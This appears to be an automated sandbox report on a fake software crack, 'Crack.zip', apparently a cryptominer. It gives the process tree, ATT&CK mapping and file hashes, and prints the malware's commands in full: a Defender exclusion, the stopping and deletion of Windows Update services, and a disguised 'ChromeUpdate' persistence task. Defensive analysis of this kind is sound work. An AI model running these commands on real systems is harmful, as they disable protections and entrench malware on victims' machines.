PID 392 wrote to memory of 2740	392	cmd.exe	sc.exe
PID 392 wrote to memory of 2740	392	cmd.exe	sc.exe
PID 736 wrote to memory of 3532	736	cmd.exe	powercfg.exe
PID 736 wrote to memory of 3532	736	cmd.exe	powercfg.exe
PID 392 wrote to memory of 3484	392	cmd.exe	sc.exe
PID 392 wrote to memory of 3484	392	cmd.exe	sc.exe
PID 392 wrote to memory of 1512	392	cmd.exe	sc.exe
PID 392 wrote to memory of 1512	392	cmd.exe	sc.exe
PID 392 wrote to memory of 3292	392	cmd.exe	sc.exe
PID 392 wrote to memory of 3292	392	cmd.exe	sc.exe
PID 736 wrote to memory of 1920	736	cmd.exe	powercfg.exe
PID 736 wrote to memory of 1920	736	cmd.exe	powercfg.exe
PID 392 wrote to memory of 2688	392	cmd.exe	reg.exe
PID 392 wrote to memory of 2688	392	cmd.exe	reg.exe
PID 392 wrote to memory of 2044	392	cmd.exe	reg.exe
PID 392 wrote to memory of 2044	392	cmd.exe	reg.exe
PID 392 wrote to memory of 3620	392	cmd.exe	reg.exe
PID 392 wrote to memory of 3620	392	cmd.exe	reg.exe
PID 392 wrote to memory of 4960	392	cmd.exe	reg.exe
PID 392 wrote to memory of 4960	392	cmd.exe	reg.exe
PID 392 wrote to memory of 4064	392	cmd.exe	reg.exe
PID 392 wrote to memory of 4064	392	cmd.exe	reg.exe
PID 5064 wrote to memory of 3964	5064	powershell.exe	schtasks.exe
PID 5064 wrote to memory of 3964	5064	powershell.exe	schtasks.exe
PID 3316 wrote to memory of 4492	3316	cmd.exe	sc.exe
PID 3316 wrote to memory of 4492	3316	cmd.exe	sc.exe
PID 3644 wrote to memory of 3844	3644	cmd.exe	powercfg.exe
PID 3644 wrote to memory of 3844	3644	cmd.exe	powercfg.exe
PID 3316 wrote to memory of 1768	3316	cmd.exe	sc.exe
PID 3316 wrote to memory of 1768	3316	cmd.exe	sc.exe
PID 3644 wrote to memory of 4108	3644	cmd.exe	powercfg.exe
PID 3644 wrote to memory of 4108	3644	cmd.exe	powercfg.exe
PID 3316 wrote to memory of 4916	3316	cmd.exe	sc.exe
PID 3316 wrote to memory of 4916	3316	cmd.exe	sc.exe
PID 3316 wrote to memory of 3484	3316	cmd.exe	sc.exe
PID 3316 wrote to memory of 3484	3316	cmd.exe	sc.exe
PID 3644 wrote to memory of 3532	3644	cmd.exe	powercfg.exe
PID 3644 wrote to memory of 3532	3644	cmd.exe	powercfg.exe
PID 3316 wrote to memory of 2300	3316	cmd.exe	sc.exe
PID 3316 wrote to memory of 2300	3316	cmd.exe	sc.exe
PID 3316 wrote to memory of 764	3316	cmd.exe	reg.exe
PID 3316 wrote to memory of 764	3316	cmd.exe	reg.exe
PID 3316 wrote to memory of 4168	3316	cmd.exe	reg.exe
PID 3316 wrote to memory of 4168	3316	cmd.exe	reg.exe
PID 3644 wrote to memory of 3868	3644	cmd.exe	powercfg.exe
PID 3644 wrote to memory of 3868	3644	cmd.exe	powercfg.exe
PID 3316 wrote to memory of 5116	3316	cmd.exe	reg.exe
PID 3316 wrote to memory of 5116	3316	cmd.exe	reg.exe
PID 3316 wrote to memory of 2688	3316	cmd.exe	reg.exe
PID 3316 wrote to memory of 2688	3316	cmd.exe	reg.exe
PID 3316 wrote to memory of 1756	3316	cmd.exe	reg.exe
PID 3316 wrote to memory of 1756	3316	cmd.exe	reg.exe
PID 3604 wrote to memory of 4944	3604	Update.exe	conhost.exe
PID 3796 wrote to memory of 1616	3796	cmd.exe	WMIC.exe
PID 3796 wrote to memory of 1616	3796	cmd.exe	WMIC.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://github.com/crack-watch/files/releases/download/ca/Crack.zip
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:940

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:940 CREDAT:17410 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2448

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:664

C:\Users\Admin\AppData\Local\Temp\Temp1_Crack.zip\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Crack.zip\Crack.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:3616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:708

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:736

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3644

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4880

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3532

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vieybfx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdate' /tr '''C:\Program Files\ChromeUpdate\Update.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\ChromeUpdate\Update.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ChromeUpdate" /t REG_SZ /f /d 'C:\Program Files\ChromeUpdate\Update.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5068

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:392

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:180

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:2740

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3484

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1512

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:3292

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:2688

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:2044

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:3620

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:4960

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:4064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iznvhmil#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "ChromeUpdate" } Else { "C:\Program Files\ChromeUpdate\Update.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5064

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn ChromeUpdate
3⤵
PID:3964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3420

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:3316

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4492

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1768

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:4916

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:3484

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:2300

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:764

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:4168

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:5116

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:2688

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1756

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:3644

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:3844

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:4108

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:3532

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:3868

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe wwcervyd
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4944

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3796

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
PID:1616

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:2480

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe ppqblwpwmghhsixh 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUFX9zerOLqyfV5p5IIIPTXecif75D+VYXIOaD4tnkrB2fDP9IQZMfg+iVVlhNRbmMN79MRifyO6Uwq7r7QxsXJx8n4Obz+C1TNZT/sBjhHaly+SynWhZiN24prHp/VTq7aAaWmtebCxKPk7tjsUOqkI/WY5IIYD/L/mVq2a7Uu9ZR/uUtm5j9plmQ6U+x61NNlg9L8LtJ//u1Fij39xU/WDSZow7jB4TkbvCOgFDyM4S6KqA9TPgrAJpGF6UT5CV/U725i+yYtjtkyP1WXyAgKjQR9PF97HfDROjSbrwKz7I/IdS3E3JvmMLokmQrzQ2tSPn0A76ciJ3JMty2BZtsAwoFXhQGVnofvN3B5vTs4kmoB+gkXCpRmPI4rTUz+43QeZFm3lO1uhw0nEtewSCLk4LGxQqR9mz9g0drWGN5XtJesEB2BtBwFU6bQGegMZe20enAYVBIDmIJ+z3YxlqN8Q==
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2408

C:\Users\Admin\AppData\Local\Temp\Temp1_Crack.zip\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Crack.zip\Crack.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:3844

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:3868

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:5036

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:3756

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:5080

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4284

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1424

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1852

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:4076

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:1664

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:4784

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:4140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vieybfx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdate' /tr '''C:\Program Files\ChromeUpdate\Update.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\ChromeUpdate\Update.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ChromeUpdate" /t REG_SZ /f /d 'C:\Program Files\ChromeUpdate\Update.exe' }
2⤵
PID:4920

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:4160

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:4936

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:756

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:3728

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:2660

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4480

C:\Program Files\ChromeUpdate\Update.exe
"C:\Program Files\ChromeUpdate\Update.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vieybfx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdate' /tr '''C:\Program Files\ChromeUpdate\Update.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\ChromeUpdate\Update.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ChromeUpdate" /t REG_SZ /f /d 'C:\Program Files\ChromeUpdate\Update.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3292

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\ChromeUpdate\Update.exe
Filesize
6.9MB

MD5
1631204510e27924774984f84392b3bc

SHA1
2244019f2c5b72ca02752db1b92b8d2200379c9b

SHA256
bc9ce0fd11d995e2cb1ca5f4200d7b95b9bc8718a4beee23a5f5ccbc7388ee52

SHA512
edc47498a57735d479492832924564819b0cd9af0d54c39936e215b3832d76461433b49d9fd98c1836352d8e0d34cd2c91adf3091b7b8809939556f6e670c5f5

Download Submit
C:\Program Files\ChromeUpdate\Update.exe
Filesize
6.9MB

MD5
1631204510e27924774984f84392b3bc

SHA1
2244019f2c5b72ca02752db1b92b8d2200379c9b

SHA256
bc9ce0fd11d995e2cb1ca5f4200d7b95b9bc8718a4beee23a5f5ccbc7388ee52

SHA512
edc47498a57735d479492832924564819b0cd9af0d54c39936e215b3832d76461433b49d9fd98c1836352d8e0d34cd2c91adf3091b7b8809939556f6e670c5f5

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\1IYUAPIF\Crack.zip.j6jricw.partial
Filesize
6.8MB

MD5
485a89a200683be78d78b0452e41c695

SHA1
a84d44cb8ea8220df7f465bedc06aaa11eb36b0f

SHA256
3f74497ab1ef54e7f89296d28ec6d2565465d416ceb6bac1e5034f06cfbe72fb

SHA512
1fe942a1dec0997ea32c1f73d0d1dec8217da15a47b18a994158eb6106942f5e4a5cb677239e11263da2a109ae9d2606e4405c54b947eba408a2f2baa4473444

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YYL8D8JJ\Crack[1].zip
Filesize
6.8MB

MD5
485a89a200683be78d78b0452e41c695

SHA1
a84d44cb8ea8220df7f465bedc06aaa11eb36b0f

SHA256
3f74497ab1ef54e7f89296d28ec6d2565465d416ceb6bac1e5034f06cfbe72fb

SHA512
1fe942a1dec0997ea32c1f73d0d1dec8217da15a47b18a994158eb6106942f5e4a5cb677239e11263da2a109ae9d2606e4405c54b947eba408a2f2baa4473444

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YYL8D8JJ\suggestions[1].en-US
Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
5eabb81f40bf3b88a1677853699692e6

SHA1
9be1b56a66e78113cba88f01c2022ad8a0c5d5ad

SHA256
fa9918faaf899c4a165d497e183692e13e65fdd140026416ea56af4f218060b0

SHA512
7fbef3a6f3056654a21b8d1c7fc9cc11e6a0d2adf100b016422bac65675dab68b8a1f0603bc44043c0c75e28f52f96815b0f33eaa17967f06d838c6ae0299c8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
08f9f3eb63ff567d1ee2a25e9bbf18f0

SHA1
6bf06056d1bb14c183490caf950e29ac9d73643a

SHA256
82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

SHA512
425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
2fd4fb751ae39737c0cc2450461f62c4

SHA1
ba0358e721e3ff04e4cf9ac79b71279235dae163

SHA256
10a352ab229aad09cd67814f467ad99ae64a86fa5ff831b884a98e4a0fb758af

SHA512
01df9635c736834f00a7db3913e8ef95395e0681442a22c0a981846ca9f7c58e73aa9fef363fe6577717e3458071bdf31120f484889344754632f58d06fbbbda

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gonp22l3.lcz.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
3KB

MD5
00930b40cba79465b7a38ed0449d1449

SHA1
4b25a89ee28b20ba162f23772ddaf017669092a5

SHA256
eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

SHA512
cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
3KB

MD5
00930b40cba79465b7a38ed0449d1449

SHA1
4b25a89ee28b20ba162f23772ddaf017669092a5

SHA256
eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

SHA512
cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
memory/708-171-0x000002183AFC0000-0x000002183AFD0000-memory.dmp

Filesize
64KB

Download
memory/708-168-0x000002183B240000-0x000002183B262000-memory.dmp

Filesize
136KB

Download
memory/708-172-0x000002183AFC0000-0x000002183AFD0000-memory.dmp

Filesize
64KB

Download
memory/2192-306-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp

Filesize
12.7MB

Download
memory/2192-301-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp

Filesize
12.7MB

Download
memory/2192-300-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp

Filesize
12.7MB

Download
